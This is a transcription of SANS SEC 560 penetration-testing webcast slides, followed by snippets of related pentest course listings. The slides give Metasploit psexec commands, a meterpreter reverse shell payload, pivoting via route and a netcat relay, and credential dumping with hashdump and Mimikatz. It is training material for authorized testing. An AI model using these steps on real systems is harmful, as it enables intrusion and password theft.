A Taste of SANS SEC 560: Adventures in High-Value Pen Testing
|
|
- Harriet White
- 6 years ago
- Views:
Transcription
1 All Rights Reserved 1 Network Penetration Testing and Ethical Hacking A Taste of SANS SEC 560: Adventures in High-Value Pen Testing SANS Security 560 Copyright 2015, All Rights Reserved Version 2Q15 All Rights Reserved 2 1
2 Ed Skoudis edskoudis For Ed Skoudis to introduce himself as: - A penetration tester and iident handler - An SANS Instructor - A course author: SANS SEC504 & SEC560 - The SANS Pen Test Curriculum Lead - Director of NetWars & CyberCity projects Ed Skoudis Ed Skoudis 04/06/ /06/2015 All Rights Reserved 3 All Rights Reserved 4 2
3 SEC 560 Course Outline 5601: Comprehensive Planning, Scoping, and Recon 5602: In-Depth Scanning 5603: Exploitation & Post Exploitation 5604: Password Attacks & Merciless Pivoting 5605: Wireless and Web Apps 5606: Full-Day Pen Test Lab and Capture the Flag Contest All Rights Reserved 5 About the SANS SEC 560 Course Our focus is on helping you master the skills needed for hands-on network penetration testing and ethical hacking Organized around the workflow of professional testers Numerous hands-on labs, culminating in a fullday end-to-end penetration test in 5606 Tips for avoiding common pitfalls And saving time to make the tester more efficient and to make the test safer All Rights Reserved 6 3
4 A Formal Penetration Testing Definition Penetration testing involves modeling the techniques used by real-world computer attackers To find vulnerabilities And, under controlled circumstaes, to exploit those flaws In a professional, safe manner according to a carefully designed scope and rules of engagement To determine business risk and potential impact all with the goal of helping the organization improve security practices All Rights Reserved 7 Why Exploitation? False positive reduction / elimination But, even if exploit doesn t work, you still may want to report on detected vulnerability Proof of vulnerability and therefore more realistic treatment of risk Use of one machine as a pivot point to get deeper inside the network More of a sense of what a real bad guy can accomplish Exploitation leads to post-exploitation which really helps us understand the business risks that the target organization faces due to discovered vulnerabilities DMZ System DMZ System Internal System Internal System Firewall Firewall All Rights Reserved 8 4
5 Risks of Exploitation Service crash System crash System stability impacted System integrity violated Data exposure with legal ramifications As a penetration tester, you likely do not want to be in possession of millions of credit card numbers or other similarly sensitive information Inadvertently accessing the wrong system Out of scope or even the wrong target organization Because of these coerns, verify that exploitation is allowed by Rules of Engagement And double check for a given system whether it is in scope Also, understand the probabilistic nature of exploit success All Rights Reserved 9 The Metasploit Arsenal Exploit Collection Exploit 1 Exploit 2 Exploit N User Interface Choose Payload Collection Payload 1 Payload 2 Payload M Auxiliary Modules Aux 1 Aux 2 Exploit 2 Payload 1 Lauher Send to target Aux N Post Modules Post 1 Post 2 Post N Metasploit divides up the coept of exploits, payloads, auxiliary, and post modules An exploit takes advantage of a flaw in a target program The payload makes the target do something the attacker wants Auxiliary modules perform all kinds of tasks, iluding scanning A post module is used in post-exploitation to plunder targets or manipulate them All Rights Reserved 10 5
6 Metasploit psexec Module Metasploit iludes a fantastic psexec module It's an exploit module, although it is not really exploiting a specific vulnerability Establishes an session with the target RHOST using a provided admin-level User and Pass, causing the target to run a specified Metasploit payload Writes an executable into the target file system, creates a service with a pseudo-random name, runs the payload with local SYSTEM privileges, and then automatically removes the executable and service, cleaning up after itself Select it at msfconsole using: msf > use exploit/windows/smb/psexec Also supports pass-the-hash, authenticating to target via an admin username and hash This module IS ONE OF THE MOST USEFUL IN ALL OF METASPLOIT, especially in a well-patched internal network environment All Rights Reserved 11 Psexec & the Pen Tester s Pledge All Rights Reserved 12 6
7 Meterpreter Futionality: Pivoting using Metasploit s Route Command Metasploit iludes a route command to pivot through an already-exploited host via a Meterpreter session Carries follow-on exploits and payloads across Meterpreter session Don t confuse this with the Meterpreter route command, which manages routing tables on a compromised system running Meterpreter msf > use [exploit1] msf > set RHOST [victim1] msf > set PAYLOAD windows/meterpreter/reverse_tcp msf > exploit meterpreter > (CTRL-Z to background session will display meterpreter sid) msf > route add [victim2_subnet] [netmask] [sid] msf > use [exploit2] msf > set RHOST [victim2] msf > set PAYLOAD [payload2] msf > exploit Pen Tester Exploit1 Meterpreter Victim1 Exploit2 Payload2 Victim2 All Rights Reserved 13 Sending Through a Netcat Relay to Pivot through Linux # mknod backpipe p # l p 445 0<backpipe tee backpipe Linux Relay Machine listener client Attacker client Mount Share, Psexec, Grab hashes, etc Target Service C:\> net use \\Linux\c$ [password] /u:[user] All Rights Reserved 14 7
8 Dumping Authentication Information from Memory with Mimikatz Mimikatz was created by Benjamin Delpy (also known as gentilkiwi) Pulls authentication information from memory on a machine Searches through LSASS memory of various specific locations, looking for password hashes and ***clear text passwords*** Originally, a separate executable (mimikatzexe) to load on a target machine and run Now, it s a Metasploit Meterpreter module All Rights Reserved 15 Course Roadmap Planning and Recon Scanning Exploitation & Post-Exploitation Password Attacks Wireless Attacks Web App Attacks Motivation and Defs Password Attack Tips Account Lockout Password Guessing with THC-Hydra Ø Lab: Hydra Password Representation Formats Obtaining Hashes Ø Lab: Fgdump & Netcat Pivot Hashdump More Hash Dumping Options Ø Lab: Msf psexec & Mimikatz John the Ripper Ø Lab: John the Ripper Cain Ø Lab: Cain Rainbow Table Attacks Ø Lab: Ophcrack Pass-the-Hash Attacks Ø Lab: Pass-the-Hash All Rights Reserved 16 8
9 Using MSF psexec, a Netcat relay, Meterpreter, & hashdump Your Linux Metasploit Compromised Linux DMZ Target listener client psexec Meterpreter hashdump Target 2 Services All Rights Reserved Target 1 Services Lauhing Metasploit and Choosing psexec Module All Rights Reserved 18 9
10 Configuring Metasploit (1) All Rights Reserved 19 Configuring Metasploit (2) Your Linux Metasploit Linux Target psexec Meterpreter All Rights Reserved 20 10
11 Preparing the Relay & Exploiting Your Linux Metasploit Linux Target psexec Meterpreter Look at the details of this session s connection, between and your Linux box All Rights Reserved 21 Dumping the Hashes Note that run hashdump can also dump password hints that users create, if they are present All Rights Reserved 22 11
12 Using msf route to Pivot and Mimikatz Let s use the msf route command to pivot across our Meterpreter session on to attack Getting Meterpreter on , and then loading Mimikatz Your Linux Metasploit Compromised Linux DMZ Target Existing Meterpreter Session Msf route to pivot thru for psexec on New Meterpreter Session Load Mimikatz and dump hashes & passwords DMZ Target Services 445 allowed from net DMZ Target Services All Rights Reserved 23 Background Session & Prepare to Attack Linux Target Existing Meterpreter Your Linux Session Metasploit 80 Msf route to pivot thru for psexec on New Meterpreter Session All Rights Reserved 24 12
13 Exploit through Pivot As long as you see the meterpreter > prompt here, it worked Don t worry about this Exploit failed warning As long as you see Session N created it worked All Rights Reserved 25 Get System Info Your Linux Existing Meterpreter 80 Session Metasploit New Meterpreter Session 443 Load Mimikatz and dump hashes & passwords Our session is with ! All Rights Reserved 26 13
14 Load Mimikatz and Dump Passwords Clear text password below! All Rights Reserved 27 Exiting & Lab Colusions In this lab, we ve seen how to use Metasploit s psexec module to deliver a Meterpreter payload through a Netcat relay so that we can dump hashes And, we ve seen how we can use a Metasploit route to pivot through a target machine to load Mimikatz to dump clear-text passwords All Rights Reserved 28 14
15 Webcast Colusions Pen testing can help a target organization better understand its risk posture and manage risks Penetration testers can take advantage of plentiful tools and techniques in our work: Metasploit and the Meterpreter Psexec for code execution via Netcat relays and msfconsole route for pivots Hashdump and Mimikatz for credentials Know your tools in-depth, and never lose your focus on providing as much business value as you can in your penetration test! It s not the weapon that s important It s the Ninja wielding it All Rights Reserved 29 All Rights Reserved 30 15
Penetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security No part of this publication, in whole or in part, may
More informationModule 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services
Following topics will be covered: Module 1: Penetration Testing Planning and Scoping - Types of penetration testing and ethical hacking projects - Penetration testing methodology - Limitations and benefits
More informationLab 3: Introduction to Metasploit
Lab 3: Introduction to Metasploit Aim: The airm of this lab is to develop and execute exploits against a remote machine and test its vulnerabilities using Metasploit. Quick tool introduction: Metasploit
More informationPILLAGE THE. More Pen Test Adventures in Post Exploitation. By John Strand & Ed Skoudis. Special Thanks to Mike Poor
PILLAGE THE VILLAGEEDUX R More Pen Test Adventures in Post Exploitation By John Strand & Ed Skoudis Special Thanks to Mike Poor Original Pillager of the Village http://inguardians.com/pubs/ Core-PillagetheVIllage.pdf
More informationAdvanced Penetration Testing
Advanced Penetration Testing Additional Insights from Georgia Weidman More Guessable Credentials: Apache Tomcat In the course we looked at specific examples of vulnerabilities. My goal was to cover as
More informationYou can find the lab demo here:
Lab 8: Armitage Aim The aim of this lab is to introduce you to Armitage. Armitage developed by Raphael Mudge provides an open source Graphical User Interface (GUI) front end to Metasploit and supports
More informationLive Adversary Simulation: Red and Blue Team Tactics
SESSION ID: HTA-T06 Live Adversary Simulation: Red and Blue Team Tactics James Lyne Head of R&D SANS Institute @JamesLyne Stephen Sims Security Researcher & Fellow SANS Institute @Steph3nSims Agenda 2
More informationETHICAL HACKING LAB SERIES. Lab 13: Exploitation with IPv6
ETHICAL HACKING LAB SERIES Lab 13: Exploitation with IPv6 Certified Ethical Hacking Domains: System Hacking, Penetration Testing Document Version: 2015-08-14 otherwise noted, is licensed under the Creative
More informationISDP 2018 Industry Skill Development Program In association with
ISDP 2018 Industry Skill Development Program In association with Penetration Testing What is penetration testing? Penetration testing is simply an assessment in a industry computer network to test the
More informationAUTHOR CONTACT DETAILS
AUTHOR CONTACT DETAILS Name Dinesh Shetty Organization Paladion Networks Email ID dinesh.shetty@paladion.net Penetration Testing with Metasploit Framework When i say "Penetration Testing tool" the first
More informationCPTE: Certified Penetration Testing Engineer
www.peaklearningllc.com CPTE: Certified Penetration Testing Engineer (5 Days) *Includes exam voucher, course video, an exam preparation guide About this course Certified Penetration Testing Engineer certification
More informationCONTENTS IN DETAIL. FOREWORD by HD Moore ACKNOWLEDGMENTS INTRODUCTION 1 THE ABSOLUTE BASICS OF PENETRATION TESTING 1 2 METASPLOIT BASICS 7
CONTENTS IN DETAIL FOREWORD by HD Moore xiii PREFACE xvii ACKNOWLEDGMENTS xix Special Thanks... xx INTRODUCTION xxi Why Do A Penetration Test?... xxii Why Metasploit?... xxii A Brief History of Metasploit...
More informationMetasploit Unleashed. Class 1: Metasploit Fundamentals. Georgia Weidman Director of Cyberwarface, Reverse Space
Metasploit Unleashed Class 1: Metasploit Fundamentals Georgia Weidman Director of Cyberwarface, Reverse Space Acknowledgments Metasploit Team Offensive Security/Metasploit Unleashed Hackers for Charity
More informationWindows Hash Reinjection Using GSECDUMP and MSVCTL By Deron Grzetich
Windows Hash Reinjection Using GSECDUMP and MSVCTL By Deron Grzetich Intro The objective of this exercise is to prove that gsecdump and msvctl actually work as prescribed. These tools can be used to reinject
More informationECCouncil Exam v9 Certified Ethical Hacker Exam V9 Version: 7.0 [ Total Questions: 125 ]
s@lm@n ECCouncil Exam 312-50v9 Certified Ethical Hacker Exam V9 Version: 7.0 [ Total Questions: 125 ] Question No : 1 An Intrusion Detection System(IDS) has alerted the network administrator to a possibly
More informationAdvanced Ethical Hacking & Penetration Testing. Ethical Hacking
Summer Training Internship Program 2017 (STIP - 2017) is a practical oriented & industrial level training program for all students who have aspiration to work in the core technical industry domain. This
More informationBraindumpsIT. BraindumpsIT - IT Certification Company provides Braindumps pdf!
BraindumpsIT http://www.braindumpsit.com BraindumpsIT - IT Certification Company provides Braindumps pdf! Exam : GPEN Title : GIAC Certified Penetration Tester Vendor : GIAC Version : DEMO Get Latest &
More informationAudience. Pre-Requisites
T R A N C H U L A S W O R K S H O P S A N D T R A I N I N G S Hands-On Penetration Testing Training Course About Tranchulas Tranchulas is a multinational information security company having its offices
More informationVulnerability Validation Tutorial
Vulnerability Validation Tutorial Last updated 01/07/2014-4.8 Vulnerability scanning plays a key role in the vulnerability management process. It helps you find potential vulnerabilities so that you can
More informationContents. Auditing Microsoft Domain Environment
Contents About the Author...2 About The Microsoft Domain Environments:...3 About Auditing:...4 Gaining First User:...5 Enumerating AD Users and Groups With Gained User:...8 Checking Common Vulnerabilities:...12
More informationSECURITY TESTING. Towards a safer web world
SECURITY TESTING Towards a safer web world AGENDA 1. 3 W S OF SECURITY TESTING 2. SECURITY TESTING CONCEPTS 3. SECURITY TESTING TYPES 4. TOP 10 SECURITY RISKS ate: 2013-14 Few Security Breaches September
More informationWeb Application Penetration Testing
Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate
More informationHacking Our Way to Better Security: Lessons from a Web Application Penetration Test. Tyler Rasmussen Mercer Engineer Research Center
Hacking Our Way to Better Security: Lessons from a Web Application Penetration Test Tyler Rasmussen Mercer Engineer Research Center About Me Cybersecurity Engineering Intern @ MERC Senior IT/Cybersecurity
More informationcs642 /introduction computer security adam everspaugh
cs642 computer security /introduction adam everspaugh ace@cs.wisc.edu definition Computer Security := understanding and improving the behavior of computing systems in the presence of adversaries adversaries
More informationCUNY John Jay College of Criminal Justice MATH AND COMPUTER SCIENCE
Instructor: Prof Aftab Ahmad Office: NB 612 Telephone No. (212)393-6314 Email Address: aahmad@jjay.cuny.edu Office Hours: By appointment TEXT & REFERENCE MATERIAL Text Notes from instructor posted on Blackboard
More informationDIS10.2. DIS10.2:Advanced Penetration Testing and Security Analyst Certification. Online Training Classroom Training Workshops Seminars
Online Training Classroom Training Workshops Seminars DIS10.2 Data and Information security Council of India DIS10.2:Advanced Penetration Testing and Security Analyst Certification HACKERS ARE NOT BORN,
More informationTexSaw Penetration Te st in g
TexSaw Penetration Te st in g What is penetration testing? The process of breaking something or using something for an unintended used case for the purpose of bettering the system or application. This
More informationGAUTAM SINGH STUDY MATERIAL SOFTWARE QUALITY Unit 17. Metasploit
Unit 17. Metasploit Metasploit is one of the most powerful tools used for penetration testing. Most of its resources can be found at www.metasploit.com. It comes in two versions: commercial and free edition.
More informationJARGON ALERT! VULNERABILITY SCAN PENETRATION TEST RED TEAM/BLUE TEAM
root@ssh1:~#whoami DIRECTOR OF TECHNOLOGY AND INFORMATION SYSTEMS 20+ YEARS CERTIFIED INFORMATION SYSTEMS SECURITY PROFESSIONAL (CISSP) CERTIFIED GIAC SYSTEM AND NETWORK AUDITOR (GSNA) CERTIFIED GIAC INCIDENT
More informationDIS10.1 Ethical Hacking and Countermeasures
DIS10.1 Ethical Hacking and Countermeasures ABOUT DIS Why choose Us. Data and internet security council is the worlds top most information security certification body. Our uniquely designed course for
More informationEthical Hacking and Prevention
Ethical Hacking and Prevention This course is mapped to the popular Ethical Hacking and Prevention Certification Exam from US-Council. This course is meant for those professionals who are looking for comprehensive
More informationWhat is Penetration Testing?
What is Penetration Testing? March 2016 Table of Contents What is Penetration Testing?... 3 Why Perform Penetration Testing?... 4 How Often Should You Perform Penetration Testing?... 4 How Can You Benefit
More informationHacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK
Hacker Academy Ltd COURSES CATALOGUE Hacker Academy Ltd. LONDON UK TABLE OF CONTENTS Basic Level Courses... 3 1. Information Security Awareness for End Users... 3 2. Information Security Awareness for
More informationNmap & Metasploit. Chun-Jen (James) Chung. Arizona State University
Nmap & Metasploit Chun-Jen (James) Chung Nmap recap Nmap uses raw IP packets in novel ways to determine what hosts are available on the network What services (application name and version) those hosts
More informationDIS10.1:Ethical Hacking and Countermeasures
1 Data and Information security Council DIS10.1:Ethical Hacking and Countermeasures HACKERS ARE NOT BORN, THEY BECOME HACKER About DIS :Data and Internet Security Council DIS is the Globally trusted Brand
More informationBreach-zilla: Lessons Learned from Large-Scale Breaches
Breach-zilla: Lessons Learned from Large-Scale Breaches Ed Skoudis v4q11r Breach-Zilla 2011, Ed Skoudis 1 $ cut -f5 -d: /etc/passwd grep -i skoudis Ed Skoudis Started infosec career at Bellcore in 1996
More informationCertified Secure Web Application Engineer
Certified Secure Web Application Engineer ACCREDITATIONS EXAM INFORMATION The Certified Secure Web Application Engineer exam is taken online through Mile2 s Assessment and Certification System ( MACS ),
More informationState of the. Union. (or: How not to use Krebs as an IDS ) (Information Security) Jeff McJunkin Senior Technical Analyst Counter Hack Challenges
State of the (Information Security) Union (or: How not to use Krebs as an IDS ) Jeff McJunkin Senior Technical Analyst Counter Hack Challenges My background IT Systems / Network Administrator for City
More informationSecurity Testing. - a requirement for a secure business. ISACA DAY in SOFIA. Gabriel Mihai Tanase, Director, Cyber Services KPMG in CEE
Gabriel Mihai Tanase, Director, Cyber Services KPMG in CEE Cyber Security Services Security Testing - a requirement for a secure business ISACA DAY in SOFIA Agenda No Agenda Some minimum theory More real
More informationContents in Detail. Foreword by Peter Van Eeckhoutte
Contents in Detail Foreword by Peter Van Eeckhoutte xix Acknowledgments xxiii Introduction xxv A Note of Thanks.... xxvi About This Book.... xxvi Part I: The Basics.... xxvii Part II: Assessments.........................................
More informationLab 4: Metasploit Framework
CSC 5991 Cyber Security Practice Lab 4: Metasploit Framework Introduction If I had eight hours to chop down a tree, I d spend the first six of them sharpening my axe. -Abraham Lincoln In this lab, you
More information1. On Kali, first start the PostgreSQL database management and metasploit services:
Lab 8: Armitage Armitage provides an open source GUI front end to Metaploit and supports the security testing against a range of vulnerabilities. We will mainly be using your Kali instance and a Windows
More informationAutomated Attack Framework for Test & Evaluation (AAFT)
Automated Attack Framework for Test & Evaluation (AAFT) 34 th International Test and Evaluation Association Symposium October 4, 2017 Mr. Andrew Shaffer The Applied Research Laboratory The Pennsylvania
More informationThe Bad Guys Are Winning So Now What?
The Bad Guys Are Winning So Now What? Ed Skoudis v1q13 Bad Guys Are Winning Now What? - 2013 Ed Skoudis 1 $ cut -f5 -d: /etc/passwd Ed Skoudis grep -i skoudis Started infosec career at Bellcore in 1996
More informationStamp Out Hash Corrup/on, Crack All the Things!
Stamp Out Hash Corrup/on, Crack All the Things! Ryan Reynolds Manager, Crowe Horwath Pentester TwiAer: @reynoldsrb Jonathan Claudius SpiderLabs Security Researcher, Trustwave Vulnerability Research TwiAer:
More informationRastaLabs Red Team Simulation Lab
RastaLabs Red Team Simulation Lab LAB OUTLINE Description RastaLabs is a virtual Red Team Simulation environment, designed to be attacked as a means of learning and honing your engagement skills. The focus
More information10 FOCUS AREAS FOR BREACH PREVENTION
10 FOCUS AREAS FOR BREACH PREVENTION Keith Turpin Chief Information Security Officer Universal Weather and Aviation Why It Matters Loss of Personally Identifiable Information (PII) Loss of Intellectual
More informationProtect Your Organization from Cyber Attacks
Protect Your Organization from Cyber Attacks Leverage the advanced skills of our consultants to uncover vulnerabilities our competitors overlook. READY FOR MORE THAN A VA SCAN? Cyber Attacks by the Numbers
More informationCSWAE Certified Secure Web Application Engineer
CSWAE Certified Secure Web Application Engineer Overview Organizations and governments fall victim to internet based attacks every day. In many cases, web attacks could be thwarted but hackers, organized
More informationSECURITY TESTING: WINDOWS OS
International Journal of Latest Research In Engineering and Computing (IJLREC) Volume 2, Issue 6, Page No. 1-11 www.ijlrec.com ISSN: 2347-6540 SECURITY TESTING: WINDOWS OS 1 Siddhanth Lathar, 2 Dr. Ashish
More informationPND at a glance: The World s Premier Online Practical Network Defense course. Self-paced, online, flexible access
The World s Premier Online Practical Network Defense course PND at a glance: Self-paced, online, flexible access 1500+ interactive slides (PDF, HTML5 and Flash) 5+ hours of video material 10 virtual labs
More informationBojan Ždrnja, CISSP, GCIA, GCIH, GWAPT INFIGO IS
Laterally pwning Windows Bojan Ždrnja, CISSP, GCIA, GCIH, GWAPT Bojan.Zdrnja@infigo.hr INFIGO IS http://www.infigo.hr Who am I? Senior information security consultant at INFIGO IS Penetration testing (all
More informationComputer Security: Cyber Essentials KAMI VANIEA 1
Computer Security: Cyber Essentials DR. KAMI VANIEA KAMI VANIEA 1 First, the news http://www.sbrcentre.co.uk/images/site_images/20522_small BusinessTheCyberRiskReportVoRFINALFeb2016.pdf http://www.informationisbeautiful.net/visualizations/worldsbiggest-data-breaches-hacks/
More informationدوره تست نفوذ. Ver.1.2 شما میتوانید آنلاین در این دوره ثبت نام بلافاصله از آن استفاده کنید. Information Gathering. Bash scripting
Ver.1.2 Information Gathering Bash scripting Information gathering (passive) شما میتوانید آنلاین در این دوره ثبت نام کنید و بلافاصله از آن استفاده کنید. دیدن نمونه آموزش هاي دوره تست نفوذ Google operators
More informationSecurity Solutions. Overview. Business Needs
Security Solutions Overview Information security is not a one time event. The dynamic nature of computer networks mandates that examining and ensuring information security be a constant and vigilant effort.
More informationWeb Application & Web Server Vulnerabilities Assessment Pankaj Sharma
Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology 1 Agenda Introduction What are Web Applications?
More informationCyber security tips and self-assessment for business
Cyber security tips and self-assessment for business Last year one in five New Zealand SMEs experienced a cyber-attack, so it s essential to be prepared. Our friends at Deloitte have put together this
More informationKERBEROS PARTY TRICKS
KERBEROS PARTY TRICKS Weaponizing Kerberos Protocol Flaws Geoffrey Janjua Who is Exumbra Operations Group? Security services and consulting Specialized services: Full scope red-team testing, digital and
More informationWhat action do you want to perform by issuing the above command?
1 GIAC - GPEN GIACCertified Penetration Tester QUESTION: 1 You execute the following netcat command: c:\target\nc -1 -p 53 -d -e cmd.exe What action do you want to perform by issuing the above command?
More informationETHICAL HACKING LAB SERIES. Lab 15: Abusing SYSTEMS
ETHICAL HACKING LAB SERIES Lab 15: Abusing SYSTEMS Certified Ethical Hacking Domain: Denial of Service Document Version: 2015-08-14 otherwise noted, is licensed under the Creative Commons Attribution 3.0
More informationExploit Development. License. Contents. General notes about the labs. General notes about the labs. Preparation. Introduction to exploit development
Exploit Development License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. All included software source
More informationUseful Hacking Series
Useful Hacking Series Welcome to the Useful Hacking Series, in this series of 20 Episodes our world-renowned penetration tester/international speaker will share with you the top useful tips used during
More informationETHICAL HACKING LAB SERIES. Lab 7: Breaking Windows Passwords
ETHICAL HACKING LAB SERIES Lab 7: Breaking Windows Passwords Certified Ethical Hacking Domain: System Hacking Document Version: 2015-08-14 otherwise noted, is licensed under the Creative Commons Attribution
More informationCS 410/510: Web Security X1: Labs Setup WFP1, WFP2, and Kali VMs on Google Cloud
CS 410/510: Web Security X1: Labs Setup WFP1, WFP2, and Kali VMs on Google Cloud Go to Google Cloud Console => Compute Engine => VM instances => Create Instance For the Boot Disk, click "Change", then
More informationHacking in the Attack Kill Chain
Hacking in the Attack Kill Chain Håkan Nohre, Consulting Systems Engineer, GIAC GPEN #9666, CISSP #76731 Erkan Djafer, Consulting Systems Engineer, CISSP #535930 Chung-wai Lee, Cyber Security Partner Account
More informationIMEC Cybersecurity for Manufacturers Penetration Testing and Top 10
IMEC Cybersecurity for Manufacturers Penetration Testing and Top 10 Christian Espinosa, Alpine Security www.alpinesecurity.com 1 Objectives Learn about penetration testing Learn what to consider when selecting
More informationThe SANS Institute Top 20 Critical Security Controls. Compliance Guide
The SANS Institute Top 20 Critical Security Controls Compliance Guide February 2014 The Need for a Risk-Based Approach A common factor across many recent security breaches is that the targeted enterprise
More informationComputers Gone Rogue. Abusing Computer Accounts to Gain Control in an Active Directory Environment. Marina Simakov & Itai Grady
Computers Gone Rogue Abusing Computer Accounts to Gain Control in an Active Directory Environment Marina Simakov & Itai Grady Motivation Credentials are a high value target for attackers No need for 0-day
More informationAbout The Presentation 11/3/2017. Hacker HiJinx-Human Ways to Steal Data. Who We Are? Ethical Hackers & Security Consultants
November 3, 2017 Hacker HiJinx-Human Ways to Steal Data Who We Are? Ethical Hackers & Security Consultants Respond To Incidents & Breaches Perform Digital Forensic Investigations Data Mine Internet Intelligence
More informationModern Day Penetration Testing Distribution Open Source Platform - Kali Linux - Study Paper
Modern Day Penetration Testing Distribution Open Source Platform - Kali Linux - Study Paper Devanshu Bhatt Abstract: Penetration testing is extremely crucial method to discover weaknesses in systems and
More informationPENETRATION TESTING. A HattdA-Oti Introduction. to Hacking. by Georgia Weidman. <e> no starch. press. San Francisco
PENETRATION TESTING A HattdA-Oti Introduction to Hacking by Georgia Weidman no starch press San Francisco CONTENTS IN DETAIL FOREWORD by Peter Van Eeckhoutte xix ACKNOWLEDGMENTS xxiii INTRODUCTION
More informationCISSP CEH PKI SECURITY + CEHv9: Certified Ethical Hacker. Upcoming Dates. Course Description. Course Outline
CISSP CEH PKI SECURITY + CEHv9: Certified Ethical Hacker Learn to find security vulnerabilities before the bad guys do! The Certified Ethical Hacker (CEH) class immerses students in an interactive environment
More informationFundamentals of Information Systems Security Lesson 5 Auditing, Testing, and Monitoring
Fundamentals of Information Systems Security Lesson 5 Auditing, Testing, and Monitoring Learning Objective Explain the importance of security audits, testing, and monitoring to effective security policy.
More informationCoding for Penetration
Coding for Penetration Testers Building Better Tools Jason Andress Ryan Linn ELSEVIER AMSTERDAM BOSTON HEIDELBERG LONDON NEW YORK OXFORD PARIS SAN DIEGO SAN FRANCISCO SINGAPORE SYDNEY TOKYO Syngress is
More informationComputer Security 2017
Computer Security 2017 Lab 1: Passwords, access control, and remote exploitation of Windows 7 This lab will be done in groups of 2 people. There are preparatory assignments for this lab, read through the
More informationComputer Security 2017
Computer Security 2017 Lab 1: Passwords, access control, and remote exploitation of Windows 7 This lab will be done in groups of 2 people. There are preparatory assignments for this lab, read through the
More informationITSY 2330 Intrusion Detection Course Syllabus
ITSY 2330 Intrusion Detection Course Syllabus Instructor Course Reference Number (CRN) Course Description: Course Prerequisite(s) Course Semester Credit Hours (SCH) (Lecture, Lab) Name: Hung Le Tel: Office:
More informationTrustwave Managed Security Testing
Trustwave Managed Security Testing SOLUTION OVERVIEW Trustwave Managed Security Testing (MST) gives you visibility and insight into vulnerabilities and security weaknesses that need to be addressed to
More informationExpert Webinar: Hacking Your Windows IT Environment
Expert Webinar: Hacking Your Windows IT Environment Presenters: Liam Cleary Microsoft MVP, Blogger helloitsliam@protonmail.com Jeff Melnick Pre-Sales Director, Netwrix Jeff.Melnick@netwrix.com www.helloitsliam.com
More informationJacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013
Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013 Welcome Back! A Quick Recap of the Last Presentation: Overview of web technologies. What it is. How it works. Why it s attractive
More information18-642: Security Mitigation & Validation
18-642: Security Mitigation & Validation 11/27/2017 Security Migitation & Validation Anti-Patterns for security mitigation & validation Poorly considered password policy Poorly considered privilege management
More informationChapter 5: Vulnerability Analysis
Chapter 5: Vulnerability Analysis Technology Brief Vulnerability analysis is a part of the scanning phase. In the Hacking cycle, vulnerability analysis is a major and important part. In this chapter, we
More informationETHICAL HACKING LAB SERIES. Lab 3: Using the SYSTEM Account
ETHICAL HACKING LAB SERIES Lab 3: Using the SYSTEM Account Certified Ethical Hacking Domain: System Hacking Document Version: 2015-08-14 otherwise noted, is licensed under the Creative Commons Attribution
More informationSecurity Testing. John Slankas
Security Testing John Slankas jbslanka@ncsu.edu Course Slides adapted from OWASP Testing Guide v4 CSC 515 Software Security What is Security Testing? Validate security controls operate as expected What
More informationPivoting ( Metasploit )
Pivoting ( Metasploit ) - Anurag Srivastava Email - Linkedin - theanuragsrivastava@gmail.com https://in.linkedin.com/in/hexachordanu Exploit-db Author page https://www.exploit-db.com/author/?a=9053 Greetz
More informationMQ Jumping... Or, move to the front of the queue, pass go and collect 200
MQ Jumping.... Or, move to the front of the queue, pass go and collect 200 Martyn Ruks DEFCON 15 2007-08-03 One Year Ago Last year I talked about IBM Networking attacks and said I was going to continue
More informationSpecialized Security Services, Inc. REDUCE RISK WITH CONFIDENCE. s3security.com
Specialized Security Services, Inc. REDUCE RISK WITH CONFIDENCE s3security.com Security Professional Services S3 offers security services through its Security Professional Services (SPS) group, the security-consulting
More informationICS Penetration Testing
Connor Leach Jackson Evans-Davies 18 June, 2018 ICS Penetration Testing Understanding the Challenges and Techniques Introductions 1 Connor Leach, GPEN, OSCP - Senior Penetration Tester - Member of Canadian
More informationANATOMY OF AN ATTACK!
ANATOMY OF AN ATTACK! Are Your Crown Jewels Safe? Dom Kapac, Security Evangelist WHAT DO WE MEAN BY CROWN JEWELS? Crown jewels for most organizations are critical infrastructure and data Data is a valuable
More informationThe Six Most Dangerous New Attack Techniques And What s Coming Next? Ed Skoudis CounterHackChallenge
The Six Most Dangerous New Attack Techniques And What s Coming Next? MODERATOR: Alan Paller SANS Institute PANELISTS: Ed Skoudis CounterHackChallenge Johannes Ullrich SANS Internet Storm Center Session
More informationCOPYRIGHTED MATERIAL. Contents. Part I: The Basics in Depth 1. Chapter 1: Windows Attacks 3. Chapter 2: Conventional and Unconventional Defenses 51
Acknowledgments Introduction Part I: The Basics in Depth 1 Chapter 1: Windows Attacks 3 Attack Classes 3 Automated versus Dedicated Attacker 4 Remote versus Local 7 Types of Attacks 8 Dedicated Manual
More informationBuilding Payloads Tutorial
Building Payloads Tutorial Last updated 06/23/2014-4.9 With Metasploit Pro, you can build payloads with the Payload Generator. The Payload Generator provides a guided interface that you can use to quickly
More informationmhealth SECURITY: STATS AND SOLUTIONS
mhealth SECURITY: STATS AND SOLUTIONS www.eset.com WHAT IS mhealth? mhealth (also written as m-health) is an abbreviation for mobile health, a term used for the practice of medicine and public health supported
More informationAURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo
ETHICAL HACKING (CEH) CURRICULUM Introduction to Ethical Hacking What is Hacking? Who is a Hacker? Skills of a Hacker? Types of Hackers? What are the Ethics and Legality?? Who are at the risk of Hacking
More informationA Model for Penetration Testing
A Model for Penetration Testing Chuck Easttom Collin College Professional Development chuck@chuckeasttom.com Research Gate Publication Abstract Penetration testing is an increasingly integral part of cyber
More informationCybersecurity Test and Evaluation Achievable and Defensible Architectures
Cybersecurity Test and Evaluation Achievable and Defensible Architectures October 2015, ITEA Francis Scott Key Chapter Mr. Robert L. Laughman for COL Scott D. Brooks, Director, Survivability Evaluation
More informationEvaluating Website Security with Penetration Testing Methodology
